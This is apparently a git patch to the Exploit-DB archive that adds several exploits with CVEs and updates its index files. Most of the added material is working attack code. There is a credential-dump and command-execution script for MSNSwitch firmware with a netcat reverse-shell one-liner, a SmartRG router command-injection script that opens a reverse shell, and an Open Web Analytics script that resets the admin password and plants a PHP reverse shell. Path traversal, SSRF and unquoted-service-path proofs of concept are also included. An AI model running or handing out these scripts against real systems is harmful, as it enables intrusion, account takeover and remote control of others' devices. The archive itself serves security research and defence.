From c9e53fa57b5d05510ab09ee8c8a64d9b853de570 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 12 Nov 2022 09:02:02 +0000 Subject: [PATCH] DB: 2022-11-12 7 changes to exploits/shellcodes/ghdb AVEVA InTouch Access Anywhere Secure Gateway 2020 R2 - Path Traversal MSNSwitch Firmware MNT.2408 - Remote Code Exectuion (RCE) SmartRG Router SR510n 2.6.13 - RCE (Remote Code Execution) Open Web Analytics 1.7.3 - Remote Code Execution (RCE) CVAT 2.0 - SSRF (Server Side Request Forgery) IOTransfer V4 - Unquoted Service Path NetTransport 2.96L - Remote Buffer Overflow (DEP Bypass) Linux/MIPS (Little Endian) - system(telnetd -l /bin/sh) Shellcode (80 bytes) Linux/MIPS - reboot() Shellcode (32 bytes) Linux/x86 - execve(/bin/sh) + Socket Re-Use Shellcode (50 bytes) Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh_ [/bin/sh_ NULL]) Shellcode (37 bytes) Windows/x86 - Write-to-file ('pwned' ./f.txt) + Null-Free Shellcode (278 bytes) --- exploits/hardware/remote/51027.py | 102 ++++++++++++ exploits/hardware/remote/51028.txt | 22 +++ exploits/hardware/remote/51031.py | 50 ++++++ exploits/php/webapps/51026.py | 247 +++++++++++++++++++++++++++++ exploits/python/webapps/51030.txt | 46 ++++++ exploits/windows/local/51029.txt | 36 +++++ exploits/windows/remote/43408.py | 2 +- files_exploits.csv | 8 +- files_shellcodes.csv | 10 +- 9 files changed, 516 insertions(+), 7 deletions(-) create mode 100755 exploits/hardware/remote/51027.py create mode 100644 exploits/hardware/remote/51028.txt create mode 100755 exploits/hardware/remote/51031.py create mode 100755 exploits/php/webapps/51026.py create mode 100644 exploits/python/webapps/51030.txt create mode 100644 exploits/windows/local/51029.txt diff --git a/exploits/hardware/remote/51027.py b/exploits/hardware/remote/51027.py new file mode 100755 index 000000000..abe1dc39a --- /dev/null +++ b/exploits/hardware/remote/51027.py @@ -0,0 +1,102 @@ +Exploit Title: MSNSwitch Firmware MNT.2408 - Remote Code Exectuion (RCE) +Google Dork: n/a +Date:9/1/2022 +Exploit Author: Eli Fulkerson +Vendor Homepage: https://www.msnswitch.com/ +Version: MNT.2408 +Tested on: MNT.2408 firmware +CVE: CVE-2022-32429 + +#!/usr/bin/python3 + + +""" + +POC for unauthenticated configuration dump, authenticated RCE on msnswitch firmware 2408. + +Configuration dump only requires HTTP access. +Full RCE requires you to be on the same subnet as the device. + +""" + +import requests +import sys +import urllib.parse +import readline +import random +import string + + +# listen with "ncat -lk {LISTENER_PORT}" on LISTENER_HOST +LISTENER_HOST = "192.168.EDIT.ME" +LISTENER_PORT = 3434 + +# target msnswitch +TARGET="192.168.EDIT.ME2" +PORT=80 + +USERNAME = None +PASSWORD = None + +""" +First vulnerability, unauthenticated configuration/credential dump +""" +if USERNAME == None or PASSWORD == None: + # lets just ask + hack_url=f"http://{TARGET}:{PORT}/cgi-bin-hax/ExportSettings.sh" + session = requests.session() + + data = session.get(hack_url) + for each in data.text.split('\n'): + key = None + val = None + + try: + key = each.strip().split('=')[0] + val = each.strip().split('=')[1] + except: + pass + + if key == "Account1": + USERNAME = val + if key == "Password1": + PASSWORD = val + +""" +Second vulnerability, authenticated command execution + +This only works on the local lan. + +for full reverse shell, modify and upload netcat busybox shell script to /tmp: + + shell script: rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.X.X 4242 >/tmp/f + download to unit: /usr/bin/wget http://192.168.X.X:8000/myfile.txt -P /tmp + +ref: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#netcat-busybox +""" + +session = requests.session() + +# initial login, establishes our Cookie +burp0_url = f"http://{TARGET}:{PORT}/goform/login" +burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": f"http://{TARGET}", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://192.168.120.17/login.asp", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"} +burp0_data = {"login": "1", "user": USERNAME, "password": PASSWORD} +session.post(burp0_url, headers=burp0_headers, data=burp0_data) + +# get our csrftoken +burp0_url = f"http://{TARGET}:{PORT}/saveUpgrade.asp" +data = session.get(burp0_url) + +csrftoken = data.text.split("?csrftoken=")[1].split("\"")[0] + +while True: + CMD = input('x:') + CMD_u = urllib.parse.quote_plus(CMD) + filename = ''.join(random.choice(string.ascii_letters) for _ in range(25)) + + try: + hack_url = f"http://{TARGET}:{PORT}/cgi-bin/upgrade.cgi?firmware_url=http%3A%2F%2F192.168.2.1%60{CMD_u}%7Cnc%20{LISTENER_HOST}%20{LISTENER_PORT}%60%2F{filename}%3F&csrftoken={csrftoken}" + + session.get(hack_url, timeout=0.01) + except requests.exceptions.ReadTimeout: + pass \ No newline at end of file diff --git a/exploits/hardware/remote/51028.txt b/exploits/hardware/remote/51028.txt new file mode 100644 index 000000000..82ce70a0c --- /dev/null +++ b/exploits/hardware/remote/51028.txt @@ -0,0 +1,22 @@ +Exploit Title: AVEVA InTouch Access Anywhere Secure Gateway 2020 R2 - Path Traversal +Exploit Author: Jens Regel (CRISEC IT-Security) +Date: 11/11/2022 +CVE: CVE-2022-23854 +Version: Access Anywhere Secure Gateway versions 2020 R2 and older + +Proof of Concept: +GET +/AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini +HTTP/1.1 + +HTTP/1.1 200 OK +Server: EricomSecureGateway/8.4.0.26844.* +(..) + +; for 16-bit app support +[fonts] +[extensions] +[mci extensions] +[files] +[Mail] +MAPI=1 \ No newline at end of file diff --git a/exploits/hardware/remote/51031.py b/exploits/hardware/remote/51031.py new file mode 100755 index 000000000..4c891edd7 --- /dev/null +++ b/exploits/hardware/remote/51031.py @@ -0,0 +1,50 @@ +# Exploit Title: SmartRG Router SR510n 2.6.13 - RCE (Remote Code Execution) +# Date: 13/06/2022 +# Exploit Author: Yerodin Richards +# Vendor Homepage: https://adtran.com +# Version: 2.5.15 / 2.6.13 (confirmed) +# Tested on: SR506n (2.5.15) & SR510n (2.6.13) +# CVE : CVE-2022-37661 + +import requests +from subprocess import Popen, PIPE + +router_host =3D "http://192.168.1.1" +authorization_header =3D "YWRtaW46QWRtMW5ATDFtMyM=3D" + +lhost =3D "lo" +lport =3D 80 + +payload_port =3D 81 + + +def main(): + e_proc =3D Popen(["echo", f"rm /tmp/s & mknod /tmp/s p & /bin/sh 0< /tm= +p/s | nc {lhost} {lport} > /tmp/s"], stdout=3DPIPE) + Popen(["nc", "-nlvp", f"{payload_port}"], stdin=3De_proc.stdout) + send_payload(f"|nc {lhost} {payload_port}|sh") + print("done.. check shell") + + +def get_session(): + url =3D router_host + "/admin/ping.html" + headers =3D {"Authorization": "Basic {}".format(authorization_header)} + r =3D requests.get(url, headers=3Dheaders).text + i =3D r.find("&sessionKey=3D") + len("&sessionKey=3D") + s =3D "" + while r[i] !=3D "'": + s =3D s + r[i] + i =3D i + 1 + return s + + +def send_payload(payload): + print(payload) + url =3D router_host + "/admin/pingHost.cmd" + headers =3D {"Authorization": "Basic {}".format(authorization_header)} + params =3D {"action": "add", "targetHostAddress": payload, "sessionKey"= +: get_session()} + requests.get(url, headers=3Dheaders, params=3Dparams).text + + +main() \ No newline at end of file diff --git a/exploits/php/webapps/51026.py b/exploits/php/webapps/51026.py new file mode 100755 index 000000000..6479af5bf --- /dev/null +++ b/exploits/php/webapps/51026.py @@ -0,0 +1,247 @@ +# Exploit Title: Open Web Analytics 1.7.3 - Remote Code Execution (RCE) +# Date: 2022-08-30 +# Exploit Author: Jacob Ebben +# Vendor Homepage: https://www.openwebanalytics.com/ +# Software Link: https://github.com/Open-Web-Analytics +# Version: <1.7.4 +# Tested on: Linux +# CVE : CVE-2022-24637 + +import argparse +import requests +import base64 +import re +import random +import string +import hashlib +from termcolor import colored + +def print_message(message, type): + if type == 'SUCCESS': + print('[' + colored('SUCCESS', 'green') + '] ' + message) + elif type == 'INFO': + print('[' + colored('INFO', 'blue') + '] ' + message) + elif type == 'WARNING': + print('[' + colored('WARNING', 'yellow') + '] ' + message) + elif type == 'ALERT': + print('[' + colored('ALERT', 'yellow') + '] ' + message) + elif type == 'ERROR': + print('[' + colored('ERROR', 'red') + '] ' + message) + +def get_normalized_url(url): + if url[-1] != '/': + url += '/' + if url[0:7].lower() != 'http://' and url[0:8].lower() != 'https://': + url = "http://" + url + return url + +def get_proxy_protocol(url): + if url[0:8].lower() == 'https://': + return 'https' + return 'http' + +def get_random_string(length): + chars = string.ascii_letters + string.digits + return ''.join(random.choice(chars) for i in range(length)) + +def get_cache_content(cache_raw): + regex_cache_base64 = r'\*(\w*)\*' + regex_result = re.search(regex_cache_base64, cache_raw) + if not regex_result: + print_message('The provided URL does not appear to be vulnerable ...', "ERROR") + exit() + else: + cache_base64 = regex_result.group(1) + return base64.b64decode(cache_base64).decode("ascii") + +def get_cache_username(cache): + regex_cache_username = r'"user_id";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:5:"(\w*)"' + return re.search(regex_cache_username, cache).group(1) + +def get_cache_temppass(cache): + regex_cache_temppass = r'"temp_passkey";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:32:"(\w*)"' + return re.search(regex_cache_temppass, cache).group(1) + +def get_update_nonce(url): + try: + update_nonce_request = session.get(url, proxies=proxies) + regex_update_nonce = r'owa_nonce" value="(\w*)"' + update_nonce = re.search(regex_update_nonce, update_nonce_request.text).group(1) + except Exception as e: + print_message('An error occurred when attempting to update config!', "ERROR") + print(e) + exit() + else: + return update_nonce + +parser = argparse.ArgumentParser(description='Exploit for CVE-2022-24637: Unauthenticated RCE in Open Web Analytics (OWA)') +parser.add_argument('TARGET', type=str, + help='Target URL (Example: http://localhost/owa/ or https://victim.xyz:8000/)') +parser.add_argument('ATTACKER_IP', type=str, + help='Address for reverse shell listener on attacking machine') +parser.add_argument('ATTACKER_PORT', type=str, + help='Port for reverse shell listener on attacking machine') +parser.add_argument('-u', '--username', default="admin", type=str, + help='The username to exploit (Default: admin)') +parser.add_argument('-p','--password', default=get_random_string(32), type=str, + help='The new password for the exploited user') +parser.add_argument('-P','--proxy', type=str, + help='HTTP proxy address (Example: http://127.0.0.1:8080/)') +parser.add_argument('-c', '--check', action='store_true', + help='Check vulnerability without exploitation') + +args = parser.parse_args() + +base_url = get_normalized_url(args.TARGET) +login_url = base_url + "index.php?owa_do=base.loginForm" +password_reset_url = base_url + "index.php?owa_do=base.usersPasswordEntry" +update_config_url = base_url + "index.php?owa_do=base.optionsGeneral" + +username = args.username +new_password = args.password + +reverse_shell = '$sock, 1=>$sock, 2=>$sock),$pipes);?>' +shell_filename = get_random_string(8) + '.php' +shell_url = base_url + 'owa-data/caches/' + shell_filename + +if args.proxy: + proxy_url = get_normalized_url(args.proxy) + proxy_protocol = get_proxy_protocol(proxy_url) + proxies = { proxy_protocol: proxy_url } +else: + proxies = {} + +session = requests.Session() + +try: + mainpage_request = session.get(base_url, proxies=proxies) +except Exception as e: + print_message('Could not connect to "' + base_url, "ERROR") + exit() +else: + print_message('Connected to "' + base_url + '" successfully!', "SUCCESS") + +if 'Open Web Analytics' not in mainpage_request.text: + print_message('Could not confirm whether this website is hosting OWA! Continuing exploitation...', "WARNING") +elif 'version=1.7.3' not in mainpage_request.text: + print_message('Could not confirm whether this OWA instance is vulnerable! Continuing exploitation...', "WARNING") +else: + print_message('The webserver indicates a vulnerable version!', "ALERT") + +try: + data = { + "owa_user_id": username, + "owa_password": username, + "owa_action": "base.login" + } + session.post(login_url, data=data, proxies=proxies) +except Exception as e: + print_message('An error occurred during the login attempt!', "ERROR") + print(e) + exit() +else: + print_message('Attempting to generate cache for "' + username + '" user', "INFO") + +print_message('Attempting to find cache of "' + username + '" user', "INFO") + +found = False + +for key in range(100): + user_id = 'user_id' + str(key) + userid_hash = hashlib.md5(user_id.encode()).hexdigest() + filename = userid_hash + '.php' + cache_url = base_url + "owa-data/caches/" + str(key) + "/owa_user/" + filename + cache_request = requests.get(cache_url, proxies=proxies) + if cache_request.status_code != 200: + continue; + cache_raw = cache_request.text + cache = get_cache_content(cache_raw) + cache_username = get_cache_username(cache) + if cache_username != username: + print_message('The temporary password for a different user was found. "' + cache_username + '": ' + get_cache_temppass(cache), "INFO") + continue; + else: + found = True + break +if not found: + print_message('No cache found. Are you sure "' + username + '" is a valid user?', "ERROR") + exit() + +cache_temppass = get_cache_temppass(cache) +print_message('Found temporary password for user "' + username + '": ' + cache_temppass, "INFO") + +if args.check: + print_message('The system appears to be vulnerable!', "ALERT") + exit() + +try: + data = { + "owa_password": new_password, + "owa_password2": new_password, + "owa_k": cache_temppass, + "owa_action": + "base.usersChangePassword" + } + session.post(password_reset_url, data=data, proxies=proxies) +except Exception as e: + print_message('An error occurred when changing the user password!', "ERROR") + print(e) + exit() +else: + print_message('Changed the password of "' + username + '" to "' + new_password + '"', "INFO") + +try: + data = { + "owa_user_id": username, + "owa_password": new_password, + "owa_action": "base.login" + } + session.post(login_url, data=data, proxies=proxies) +except Exception as e: + print_message('An error occurred during the login attempt!', "ERROR") + print(e) + exit() +else: + print_message('Logged in as "' + username + '" user', "SUCCESS") + +nonce = get_update_nonce(update_config_url) + +try: + log_location = "/var/www/html/owa/owa-data/caches/" + shell_filename + data = { + "owa_nonce": nonce, + "owa_action": "base.optionsUpdate", + "owa_config[base.error_log_file]": log_location, + "owa_config[base.error_log_level]": 2 + } + session.post(update_config_url, data=data, proxies=proxies) +except Exception as e: + print_message('An error occurred when attempting to update config!', "ERROR") + print(e) + exit() +else: + print_message('Creating log file', "INFO") + +nonce = get_update_nonce(update_config_url) + +try: + data = { + "owa_nonce": nonce, + "owa_action": "base.optionsUpdate", + "owa_config[shell]": reverse_shell + } + session.post(update_config_url, data=data, proxies=proxies) +except Exception as e: + print_message('An error occurred when attempting to update config!', "ERROR") + print(e) + exit() +else: + print_message('Wrote payload to log file', "INFO") + +try: + session.get(shell_url, proxies=proxies) +except Exception as e: + print(e) +else: + print_message('Triggering payload! Check your listener!', "SUCCESS") + print_message('You can trigger the payload again at "' + shell_url + '"' , "INFO") \ No newline at end of file diff --git a/exploits/python/webapps/51030.txt b/exploits/python/webapps/51030.txt new file mode 100644 index 000000000..75778db45 --- /dev/null +++ b/exploits/python/webapps/51030.txt @@ -0,0 +1,46 @@ +#Exploit Title: CVAT 2.0 - SSRF (Server Side Request Forgery) +#Exploit Author: Emir Polat +#Vendor Homepage: https://github.com/opencv/cvat +#Version: < 2.0.0 +#Tested On: Version 1.7.0 - Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-122-generic x86_64) +#CVE: CVE-2022-31188 + +# Description: +#CVAT is an opensource interactive video and image annotation tool for computer vision. Versions prior to 2.0.0 were found to be subject to a Server-side request forgery (SSRF) vulnerability. +#Validation has been added to urls used in the affected code path in version 2.0.0. Users are advised to upgrade. + +POST /api/v1/tasks/2/data HTTP/1.1 +Host: localhost:8080 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:97.0) Gecko/20100101 Firefox/97.0 +Accept: application/json, text/plain, */* +Accept-Language:en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Authorization: Token 06d88f739a10c7533991d8010761df721b790b7 +X-CSRFTOKEN:65s9UwX36e9v8FyiJi0KEzgMigJ5pusEK7dU4KSqgCajSBAYQxKDYCOEVBUhnIGV +Content-Type: multipart/form-data; boundary=-----------------------------251652214142138553464236533436 +Content-Length: 569 +Origin: http://localhost:8080 +Connection: close +Referer:http://localhost:8080/tasks/create +Cookie: csrftoken=65s9UwX36e9v8FyiJi0KEzgMigJ5pusEK7dU4KSqgCajSBAYQxKDYCOEVBUhnIGv; sessionid=dzks19fhlfan8fgq0j8j5toyrh49dned +Sec-Fetch-Dest: empty +Sec-Fetch-Mode: cors +Sec-Fetch-Site: same-origin + +-----------------------------251652214142138553464236533436 +Content-Disposition: form-data; name="remote files[0]" + +http://localhost:8081 +-----------------------------251652214142138553464236533436 +Content-Disposition: form-data; name=" image quality" + +170 +-----------------------------251652214142138553464236533436 +Content-Disposition: form-data; name="use zip chunks" + +true +-----------------------------251652214142138553464236533436 +Content-Disposition: form-data; name="use cache" + +true +-----------------------------251652214142138553464236533436-- \ No newline at end of file diff --git a/exploits/windows/local/51029.txt b/exploits/windows/local/51029.txt new file mode 100644 index 000000000..fd10a904e --- /dev/null +++ b/exploits/windows/local/51029.txt @@ -0,0 +1,36 @@ +# Exploit Title: IOTransfer V4 - Unquoted Service Path +# Exploit Author: BLAY ABU SAFIAN (Inveteck Global) +# Discovery Date: 2022-28-07 +# Vendor Homepage: http://www.iobit.com/en/index.php +# Software Link: https://iotransfer.itopvpn.com/download/ +# Tested Version: V4 +# Vulnerability Type: Unquoted Service Path +# Tested on OS: Microsoft Windows Server 2019 Standard Evaluation CVE-2022-37197 +# Step to discover Unquoted Service Path: + +C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ + +IOTransfer Updater IOTUpdaterSvc C:\Program Files (x86)\IOTransfer\Updater\IOTUpdater.exe + Auto + +C:\>sc qc IOTUpdaterSvc +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: IOTUpdaterSvc + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\IOTransfer\Updater\IOTUpdater.exe + + +LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : IOTransfer Updater + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +C:\>systeminfo + +OS Name: Microsoft Windows Server 2019 Standard Evaluation +OS Version: 10.0.17763 N/A Build 17763 +OS Manufacturer: Microsoft Corporation \ No newline at end of file diff --git a/exploits/windows/remote/43408.py b/exploits/windows/remote/43408.py index 191eb3a48..d8ce8fce0 100755 --- a/exploits/windows/remote/43408.py +++ b/exploits/windows/remote/43408.py @@ -1,4 +1,4 @@ -#!/usr/bin/pythion +#!/usr/bin/python # Exploit Title: Buffer overflow in NetTransport Download Manager - Version 2.96L (DEP Bypass) # CVE: CVE-2017-17968 diff --git a/files_exploits.csv b/files_exploits.csv index bb25e7905..5bab5526c 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -3309,6 +3309,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 50569,exploits/hardware/remote/50569.txt,"Auerswald COMpact 8.0B - Multiple Backdoors",2021-12-06,"RedTeam Pentesting GmbH",remote,hardware,,2021-12-06,2022-01-05,0,CVE-2021-40859,,,,, 50567,exploits/hardware/remote/50567.txt,"Auerswald COMpact 8.0B - Privilege Escalation",2021-12-06,"RedTeam Pentesting GmbH",remote,hardware,,2021-12-06,2021-12-06,0,,,,,, 17507,exploits/hardware/remote/17507.py,"Avaya IP Office Manager TFTP Server 8.1 - Directory Traversal",2011-07-08,"SecPod Research",remote,hardware,,2011-07-08,2011-07-24,1,OSVDB-73121,,,,,http://secpod.org/advisories/SECPOD_Avaya_IP_Manager_TFTP_Dir_Trav.txt +51028,exploits/hardware/remote/51028.txt,"AVEVA InTouch Access Anywhere Secure Gateway 2020 R2 - Path Traversal",2022-11-11,"Jens Regel",remote,hardware,,2022-11-11,2022-11-11,0,CVE-2022-23854,,,,, 39194,exploits/hardware/remote/39194.txt,"AVM FRITZ!Box < 6.30 - Remote Buffer Overflow",2016-01-07,"RedTeam Pentesting",remote,hardware,,2016-01-07,2016-01-07,0,OSVDB-132698,,,,,https://www.redteam-pentesting.de/advisories/rt-sa-2015-001 7845,exploits/hardware/remote/7845.txt,"AXIS 70U - Network Document Server Privilege Escalation / Cross-Site Scripting",2009-01-21,DSecRG,remote,hardware,,2009-01-20,,1,OSVDB-51658;OSVDB-51657;OSVDB-51656,,,,, 36428,exploits/hardware/remote/36428.txt,"Axis M10 Series Network Cameras - Cross-Site Scripting",2011-12-07,"Matt Metzger",remote,hardware,,2011-12-07,2015-03-19,1,CVE-2011-5261;OSVDB-77395,,,,,https://www.securityfocus.com/bid/50968/info @@ -3712,6 +3713,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 40734,exploits/hardware/remote/40734.sh,"MOVISTAR BHS_RTA ADSL Router - Remote File Disclosure",2016-11-08,"Todor Donev",remote,hardware,,2016-11-08,2017-11-08,0,,,,,, 44398,exploits/hardware/remote/44398.py,"Moxa AWK-3131A 1.4 < 1.7 - 'Username' OS Command Injection",2017-04-03,Talos,remote,hardware,,2018-04-03,2018-04-03,0,CVE-2017-14459,,,,,https://talosintelligence.com/vulnerability_reports/TALOS-2017-0507 47536,exploits/hardware/remote/47536.txt,"Moxa EDR-810 - Command Injection / Information Disclosure",2019-10-22,RandoriSec,remote,hardware,,2019-10-22,2019-10-22,0,CVE-2019-10969;CVE-2019-10963,,,,, +51027,exploits/hardware/remote/51027.py,"MSNSwitch Firmware MNT.2408 - Remote Code Exectuion (RCE)",2022-11-11,"Eli Fulkerson",remote,hardware,,2022-11-11,2022-11-11,0,CVE-2022-32429,,,,, 39596,exploits/hardware/remote/39596.py,"Multiple CCTV-DVR Vendors - Remote Code Execution",2016-03-23,K1P0D,remote,hardware,,2016-03-23,2016-03-23,0,,,,,, 35317,exploits/hardware/remote/35317.txt,"Multiple Check Point Endpoint Security Products - Information Disclosure",2011-02-07,Rapid7,remote,hardware,,2011-02-07,2014-11-22,1,OSVDB-72797,,,,,https://www.securityfocus.com/bid/46224/info 48620,exploits/hardware/remote/48620.txt,"mySCADA myPRO 7 - Hardcoded Credentials",2020-06-25,"Emre ÖVÜNÇ",remote,hardware,,2020-06-25,2020-06-25,0,CVE-2018-11311,,,,, @@ -3821,6 +3823,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 19831,exploits/hardware/remote/19831.rb,"Siemens Simatic S7-300/400 - CPU START/STOP Module (Metasploit)",2012-07-14,"Dillon Beresford",remote,hardware,102,2012-07-14,2012-07-14,0,OSVDB-72870,"Metasploit Framework (MSF)",,,, 47083,exploits/hardware/remote/47083.py,"Siemens TIA Portal - Remote Command Execution",2019-07-10,"Joseph Bingham",remote,hardware,,2019-07-10,2020-06-18,0,,,,,, 21268,exploits/hardware/remote/21268.py,"Sitecom MD-25x - Multiple Vulnerabilities",2012-09-12,"Mattijs van Ommeren",remote,hardware,,2012-09-12,2016-12-04,0,OSVDB-85599;OSVDB-85598,,,,http://www.exploit-db.comSitecomNas.2.4.17.bin,http://www.alcyon.nl/advisories/aa-007 +51031,exploits/hardware/remote/51031.py,"SmartRG Router SR510n 2.6.13 - RCE (Remote Code Execution)",2022-11-11,"Yerodin Richards",remote,hardware,,2022-11-11,2022-11-11,0,CVE-2022-37661,,,,, 50940,exploits/hardware/remote/50940.txt,"SolarView Compact 6.0 - OS Command Injection",2022-05-17,"Ahmed Alroky",remote,hardware,,2022-05-17,2022-05-17,0,CVE-2022-29303,,,,, 50950,exploits/hardware/remote/50950.txt,"SolarView Compact 6.00 - Directory Traversal",2022-06-03,"Ahmed Alroky",remote,hardware,,2022-06-03,2022-06-03,0,CVE-2022-29298,,,,, 36205,exploits/hardware/remote/36205.txt,"SonicWALL - 'SessId' Cookie Brute Force / Admin Session Hijacking",2011-10-04,"Hugo Vazquez",remote,hardware,,2011-10-04,2019-03-28,1,OSVDB-76147,,,,,https://www.securityfocus.com/bid/49930/info @@ -24553,6 +24556,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 40193,exploits/php/webapps/40193.txt,"Open Upload 0.4.2 - Cross-Site Request Forgery (Add Admin)",2016-08-02,"Vinesh Redkar",webapps,php,80,2016-08-02,2016-08-02,0,,,,,http://www.exploit-db.comopenupload-0.4.2.tar.gz, 11903,exploits/php/webapps/11903.txt,"Open Web Analytics 1.2.3 - Multiple File Inclusions",2010-03-27,ITSecTeam,webapps,php,,2010-03-26,,1,OSVDB-66260;CVE-2010-2677;CVE-2010-2676;OSVDB-63288,,,,,http://www.ITSecTeam.com/en/vulnerabilities/vulnerability26.htm 31738,exploits/php/webapps/31738.py,"Open Web Analytics 1.5.4 - 'owa_email_address' SQL Injection",2014-02-18,"Dana James Traversie",webapps,php,,2014-02-18,2014-02-18,0,CVE-2014-1206;OSVDB-101925,,,,,http://www.secureworks.com/contact/terms_of_use/ +51026,exploits/php/webapps/51026.py,"Open Web Analytics 1.7.3 - Remote Code Execution (RCE)",2022-11-11,"Jacob Ebben",webapps,php,,2022-11-11,2022-11-11,0,CVE-2022-24637,,,,, 12676,exploits/php/webapps/12676.txt,"Open-AudIT - Multiple Vulnerabilities",2010-05-21,"Sébastien Duquette",webapps,php,,2010-05-20,,1,OSVDB-65175,,,,, 48516,exploits/php/webapps/48516.txt,"Open-AudIT 3.3.0 - Reflective Cross-Site Scripting (Authenticated)",2020-05-26,"Kamaljeet Kumar",webapps,php,,2020-05-26,2020-05-26,0,CVE-2020-12261,,,,, 50651,exploits/php/webapps/50651.txt,"Open-AudIT Community 4.2.0 - Cross-Site Scripting (XSS) (Authenticated)",2022-01-10,"Dominic Clark",webapps,php,,2022-01-10,2022-01-10,0,CVE-2021-44916,,,,, @@ -34114,6 +34118,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 47497,exploits/python/webapps/47497.py,"Ajenti 2.1.31 - Remote Code Execution",2019-10-14,"Jeremy Brown",webapps,python,,2019-10-14,2019-10-14,0,,,,,, 48929,exploits/python/webapps/48929.py,"Ajenti 2.1.36 - Remote Code Execution (Authenticated)",2020-10-23,"Ahmet Ümit BAYRAM",webapps,python,,2020-10-23,2020-10-23,0,,,,,, 43021,exploits/python/webapps/43021.py,"Check_MK 1.2.8p25 - Information Disclosure",2017-10-18,"Julien Ahrens",webapps,python,,2017-10-20,2017-10-20,0,CVE-2017-14955,,,,http://www.exploit-db.comcheck-mk-enterprise-1.2.8p25.demo_0.stretch_amd64.deb, +51030,exploits/python/webapps/51030.txt,"CVAT 2.0 - SSRF (Server Side Request Forgery)",2022-11-11,"Emir Polat",webapps,python,,2022-11-11,2022-11-11,0,CVE-2022-31188,,,,, 47879,exploits/python/webapps/47879.md,"Django < 3.0 < 2.2 < 1.11 - Account Hijack",2019-12-24,"Ryuji Tsutsui",webapps,python,,2020-01-06,2020-04-13,1,CVE-2019-19844,,,,,https://ryu22e.org/en/posts/2019/12/25/django-cve-2019-19844/ 40129,exploits/python/webapps/40129.txt,"Django CMS 3.3.0 - Editor Snippet Persistent Cross-Site Scripting",2016-07-20,Vulnerability-Lab,webapps,python,80,2016-07-20,2016-07-20,1,CVE-2016-6186,,,,http://www.exploit-db.comdjango-1.10b1.tar.gz,https://www.vulnerability-lab.com/get_content.php?id=1869 50393,exploits/python/webapps/50393.txt,"django-unicorn 0.35.3 - Stored Cross-Site Scripting (XSS)",2021-10-08,"Raven Security Associates",webapps,python,,2021-10-08,2021-10-08,0,CVE-2021-42053,,,,, @@ -39666,6 +39671,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 49371,exploits/windows/local/49371.txt,"IObit Uninstaller 10 Pro - Unquoted Service Path",2021-01-06,"Mayur Parmar",local,windows,,2021-01-06,2021-01-06,0,,,,,, 47538,exploits/windows/local/47538.txt,"IObit Uninstaller 9.1.0.8 - 'IObitUnSvr' Unquoted Service Path",2019-10-23,"Sainadh Jamalpur",local,windows,,2019-10-23,2019-10-23,0,,,,,, 48543,exploits/windows/local/48543.txt,"IObit Uninstaller 9.5.0.15 - 'IObit Uninstaller Service' Unquoted Service Path",2020-06-04,Gobinathan,local,windows,,2020-06-04,2020-06-04,0,,,,,, +51029,exploits/windows/local/51029.txt,"IOTransfer V4 - Unquoted Service Path",2022-11-11,"BLAY ABU SAFIAN",local,windows,,2022-11-11,2022-11-11,0,CVE-2022-37197,,,,, 48968,exploits/windows/local/48968.txt,"IP Watcher v3.0.0.30 - 'PACService.exe' Unquoted Service Path",2020-10-28,"Mohammed Alshehri",local,windows,,2020-10-28,2020-10-28,0,,,,,, 46334,exploits/windows/local/46334.py,"IP-Tools 2.5 - 'Log to file' Local Buffer Overflow (SEH) (Egghunter)",2019-02-11,"Juan Prescotto",local,windows,,2019-02-11,2019-04-30,0,,Local,,,http://www.exploit-db.comip-tools.exe, 46334,exploits/windows/local/46334.py,"IP-Tools 2.5 - 'Log to file' Local Buffer Overflow (SEH) (Egghunter)",2019-02-11,"Juan Prescotto",local,windows,,2019-02-11,2019-04-30,0,,"Buffer Overflow",,,http://www.exploit-db.comip-tools.exe, @@ -43751,7 +43757,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 34831,exploits/windows/remote/34831.c,"NetStumbler 0.4 - 'mfc71esn.dll' DLL Loading Arbitrary Code Execution",2010-10-10,Pepelux,remote,windows,,2010-10-10,2014-10-01,1,,,,,,https://www.securityfocus.com/bid/43913/info 22909,exploits/windows/remote/22909.txt,"NetSuite 1.0/1.2 - HTTP Server Directory Traversal",2003-07-15,dr_insane,remote,windows,,2003-07-15,2012-11-25,1,,,,,,https://www.securityfocus.com/bid/8197/info 16735,exploits/windows/remote/16735.rb,"NetTerm NetFTPD - 'USER' Remote Buffer 